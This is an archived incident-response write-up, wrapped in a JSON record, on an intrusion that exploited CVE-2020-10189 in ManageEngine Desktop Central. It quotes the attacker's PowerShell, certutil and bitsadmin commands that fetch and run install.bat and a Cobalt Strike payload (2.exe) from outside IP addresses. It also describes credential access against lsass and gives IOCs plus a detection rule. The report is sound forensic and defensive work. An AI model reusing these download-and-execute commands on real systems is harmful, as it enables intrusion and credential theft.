{
	"id": "730858cb-93e1-4c24-9a2e-fc705f4458fb",
	"created_at": "2026-04-06T00:07:35.596985Z",
	"updated_at": "2026-04-10T03:21:27.160056Z",
	"deleted_at": null,
	"sha1_hash": "fbd3f0da04889c02840ec637d7f4b017caa172b2",
	"title": "Analysis Of Exploitation: CVE-2020-10189",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1202001,
	"plain_text": "Analysis Of Exploitation: CVE-2020-10189\r\nBy Luke Rusten\r\nArchived: 2026-04-05 15:23:53 UTC\r\nThe Recon incident response team recently worked an intrusion case involving a ManageEngine Desktop Central server that was affected by CVE-2020-10189.\r\nZoho ManageEngine Desktop Central 10 allows remote code execution because of deserialization of untrusted data in getChartImage in the FileStorage class. This is related to the CewolfServlet and MDMLogUploaderServlet servlets.\r\nhttps://nvd.nist.gov/vuln/detail/CVE-2020-10189#vulnCurrentDescriptionTitle\r\nRemote Code Execution vulnerability disclosed on Twitter\r\nDuring our research of Desktop Central vulnerabilities we located a post on Twitter from a researcher who had disclosed an RCE for Desktop Central on March 5, 2020 (Figure 1).\r\nFigure 1 - Vulnerability disclosed on Twitter\r\nResearch on CVE-2020-10189 also showed that vulnerable Desktop Central servers were searchable on Shodan, a popular search engine for Internet-connected devices often used by attackers looking for vulnerable targets (Figure 2).\r\nFigure 2 - Vulnerable Desktop Central servers searchable on Shodan\r\nhttps://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/\r\nPage 1 of 11\n\nInitial compromise was determined based on a suspicious PowerShell download cradle that contained instructions to download files from a dotted-quad URL.\r\nOne of the earliest activities carried out by the actor was a series of suspicious PowerShell download commands. The commands contained instructions to download install.bat and storesyncsvc.dll to C:\\Windows\\Temp and then immediately execute install.bat (Figure 3).\r\ncmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/install.\r\nFigure 3 - Suspicious PowerShell download commands\r\nThe install.bat script contained instructions to install storesyncsvc.dll as a service on the system 
(Figure 4).\r\nFigure 4 - Install.bat contents\r\nPredictably, within seconds of the suspicious PowerShell commands being run, we observed the installation of a new service with the Service Name StorSyncSvc and Display Name Storage Sync Service (Figure 5).\r\nFigure 5 - Storage Sync Service install\r\nOSINT quickly confirmed that storesyncsvc.dll had previously been observed by others hit by this campaign. VirusTotal results indicated that several detection engines had already classified storesyncsvc.dll as malware.\r\nhttps://www.virustotal.com/gui/file/f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c/details\r\nLeveraging Process Tracking to Identify Application Exploitation\r\nKnowing that an RCE had been disclosed via Twitter on March 5, 2020, only a few days prior to this intrusion, we already had a strong theory that the attack vector was exploitation of the Zoho ManageEngine Desktop Central application.\r\nReview of Sysmon process creation events indicated that C:\\ManageEngine\\DesktopCentral_Server\\jre\\bin\\java.exe was the process responsible for executing the PowerShell download commands (Figure 6).\r\nFigure 6 - ParentImage responsible for PowerShell download\r\nLooking at processes in memory, we also observed the parent/child relationship between the Desktop Central java.exe application, cmd.exe and 2.exe (Figure 7).\r\nFigure 7 - java.exe parent/child process relationships\r\nLeveraging Filesystem Artifacts to Identify Application Exploitation\r\nTo further validate our theory, we compared the artifacts that had been collected from the affected Desktop Central server to the POC that had been published and determined that the attacker had 
likely leveraged the CVE-2020-10189 vulnerability to run code on this vulnerable system.\r\nThrough filesystem timeline analysis we determined that a traversal file write had likely occurred on the system with the file names _chart (Figure 8) and logger.zip (Figure 9).\r\nFigure 8 - File system analysis _chart\r\nFigure 9 - File system analysis logger.zip\r\nThese file names were also referenced in the POC that had been released by @Steventseeley (Figure 10).\r\nFigure 10 - POC references to _chart and logger.zip, reference: https://srcincite.io/pocs/src-2020-0011.py.txt\r\nCommand and Control Payload Introduced To System\r\nSubsequent process creation logs revealed cmd.exe and certutil.exe commands being used to download and execute 2.exe (Figure 11). Further analysis revealed a high likelihood of 2.exe being part of the popular post-exploitation and C2 tool Cobalt Strike.\r\ncmd /c certutil -urlcache -split -f http://91.208.184.78/2.exe \u0026\u0026 2.exe\r\nFigure 11 - Certutil commands\r\nOSINT revealed that 2.exe was already identified as malware by several detection engines on VirusTotal: https://www.virustotal.com/gui/file/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/detai\r\nLeveraging the app.any.run sandbox (Figure 12) and memory analysis of the malware further confirmed the likelihood of 2.exe being a hosted Cobalt Strike Beacon payload.\r\nFigure 12 - 2.exe classified as Cobalt Strike Beacon\r\nhttps://any.run/report/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/e65dd4ff-60c6-49a4-8e6d-94c6c80a74b6\r\nYARA ANALYSIS SUPPORTS 2.EXE CLASSIFICATION AS COBALT STRIKE\r\nWe performed a yara scan against all memory sections in use by the known malware, 2.exe. 
The yara scan results further supported the theory of 2.exe resembling a Cobalt Strike beacon, among several other possible malware signature hits (Figure 13).\r\nFigure 13 - Yarascan results\r\nLeveraging Volatility’s malfind plugin, we identified several memory sections with potential signs of code injection. We fired off another yara scan, this time against the memory sections dumped by malfind. This provided additional validation of the likely presence of a Cobalt Strike Beacon. See that entire process in the asciinema recording below (Figure 14).\r\ntotal 12M\r\ndrwxr-xr-x 2 root root 4.0K Mar 9 20:36 .\r\ndrwxr-xr-x 3 root root 4.0K Mar 10 02:35 ..\r\n-rw-r--r-- 1 root root 4.0K Mar 9 20:36 process.0xffffd00a1bd05080.0xe40000.dmp\r\n-rw-r--r-- 1 root root 64K Mar 9 20:36 process.0xffffd00a1d486800.0x1170000.dmp\r\n-rw-r--r-- 1 root root 64K Mar 9 20:36 process.0xffffd00a1d486800.0x3790000.dmp\r\n-rw-r--r-- 1 root root 4.0K Mar 9 20:36 process.0xffffd00a1ddaf080.0xfe0000.dmp\r\n-rw-r--r-- 1 root root 64K Mar 9 20:36 process.0xffffd00a21f78740.0x1aaf8510000.dmp\r\n-rw-r--r-- 1 root root 64K Mar 9 20:36 process.0xffffd00a23986800.0x20a9a9e0000.dmp\r\n-rw-r--r-- 1 root root 1.0M Mar 9 20:36 process.0xffffd00a2502d280.0x2131e280000.dmp\r\n-rw-r--r-- 1 root root 2.0M Mar 9 20:36 process.0xffffd00a2502d280.0x2131e380000.dmp\r\n-rw-r--r-- 1 root root 4.0K Mar 9 20:36 process.0xffffd00a2d400800.0x120000.dmp\r\n-rw-r--r-- 1 root root 4.0M Mar 9 20:36 process.0xffffd00a2d400800.0x2660000.dmp\r\n-rw-r--r-- 1 root root 276K Mar 9 20:36 process.0xffffd00a2d400800.0x2ca0000.dmp\r\n-rw-r--r-- 1 root root 4.5M Mar 9 20:36 process.0xffffd00a2d7ef800.0x21738f20000.dmp\r\nroot@siftworkstation : /cases/desktopcentral/DesktopCentral\r\n# apt install yara -y\r\nReading package lists... Done\r\nBuilding dependency tree\r\nReading state information... 
Done\r\nThe following NEW packages will be installed:\r\n yara\r\n0 upgraded, 1 newly installed, 0 to remove and 3 not upgraded.\r\nNeed to get 117 kB of archives.\r\nAfter this operation, 555 kB of additional disk space will be used.\r\nGet:1 http://us.archive.ubuntu.com/ubuntu xenial/universe amd64 yara amd64 3.4.0+dfsg-2build1 [117 kB]\r\nFetched 117 kB in 0s (191 kB/s)\r\nSelecting previously unselected package yara.\r\n(Reading database ... 251659 files and directories currently installed.)\r\nPreparing to unpack .../yara_3.4.0+dfsg-2build1_amd64.deb ...\r\nUnpacking yara (3.4.0+dfsg-2build1) ...\r\nProcessing triggers for man-db (2.7.5-1) ...\r\nSetting up yara (3.4.0+dfsg-2build1) ...\r\nroot@siftworkstation : /cases/desktopcentral/DesktopCentral\r\n#\r\nFigure 14 - Yarascan against malfind output\r\nWe then examined malfind’s output for evidence of code injection and identified suspicious memory sections within svchost.exe (Figure 15). OSINT research led us to a researcher who had reversed the malware and found the area responsible for injecting code into svchost.exe (Figure 16).\r\nFigure 15 - Our analysis of svchost containing injected code\r\nFigure 16 - @VK_Intel’s analysis showing likely inject function\r\nReference:\r\nAmong the post-compromise activities, we observed malicious Bitsadmin commands that contained instructions to transfer install.bat from 66.42.96.220 over suspicious port 12345.\r\nOur analysts observed bitsadmin commands being run on the Desktop Central server which contained the same IP address, port and install.bat file called in the PowerShell download commands (Figure 17).\r\ncmd /c bitsadmin /transfer bbbb http://66.42.98.220:12345/test/install.bat C:\\Users\\Public\\install.bat\r\nFigure 17 - Bitsadmin commands\r\nCredential Access\r\nWe also observed potential credential access activity. 
A common technique for attackers to perform credential dumping is using a malicious process (SourceImage) to access another process (the TargetImage). Most commonly, lsass.exe is targeted as it often contains sensitive information such as account credentials.\r\nHere, we observed the SourceImage 2.exe accessing the TargetImage lsass.exe (Figure 18). The Cobalt Strike Beacon contains native credential dumping capabilities similar to Mimikatz. The only required condition to use this capability is SYSTEM privileges, which the attacker had. The event below provides sufficient evidence that the risk of credential access is high.\r\nFigure 18 - 2.exe accessing lsass.exe\r\nDuring our analysis of this intrusion, we added a few collection targets to Eric Zimmerman's KAPE tool to add the relevant logs to triage efforts. Read more about KAPE.\r\nExample usage targeting relevant logs (tune for your use-case):\r\nkape.exe --tsource C: --tdest c:\\temp\\tout --tflush --target ManageEngineLogs\r\nIOCs\r\nStoresyncsvc.dll\r\nMD5: 5909983db4d9023e4098e56361c96a6f\r\nSHA256: f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c\r\nInstall.bat\r\nMD5: 7966c2c546b71e800397a67f942858d0\r\nSHA256: de9ef08a148305963accb8a64eb22117916aa42ab0eddf60ccb8850468a194fc\r\n2.exe\r\nMD5: 3e856162c36b532925c8226b4ed3481c\r\nSHA256: d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309\r\n66[.]42[.]98[.]220\r\n91[.]208[.]184[.]78\r\n74[.]82[.]201[.]8\r\nDetection\r\nFlorian Roth of the Sigma project has created a signature to detect some of the techniques leveraged by the attackers:\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_exploit_cve_2020_10189.yml\r\nOur analysis of this attack also found that detection based on command-line activity in process creation logs would be valuable.\r\nParentImage | 
endswith:\r\n'DesktopCentral_Server\\jre\\bin\\java.exe'\r\nCommandLine | contains:\r\n'*powershell*'\r\n'*certutil*'\r\n'*bitsadmin*'\r\nDFIR, Incident Response, Forensics, SecOps, InfoSec, Defense, Malware, Exploit, CVE-2020-10189, Intel Sharing, Zoho, Vulnerability, ManageEngine\r\nSource: https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/"
	],
	"report_names": [
		"analysis-of-exploitation-cve-2020-10189"
	],
	"threat_actors": [],
	"ts_created_at": 1775434055,
	"ts_updated_at": 1775791287,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fbd3f0da04889c02840ec637d7f4b017caa172b2.pdf",
		"text": "https://archive.orkl.eu/fbd3f0da04889c02840ec637d7f4b017caa172b2.txt",
		"img": "https://archive.orkl.eu/fbd3f0da04889c02840ec637d7f4b017caa172b2.jpg"
	}
}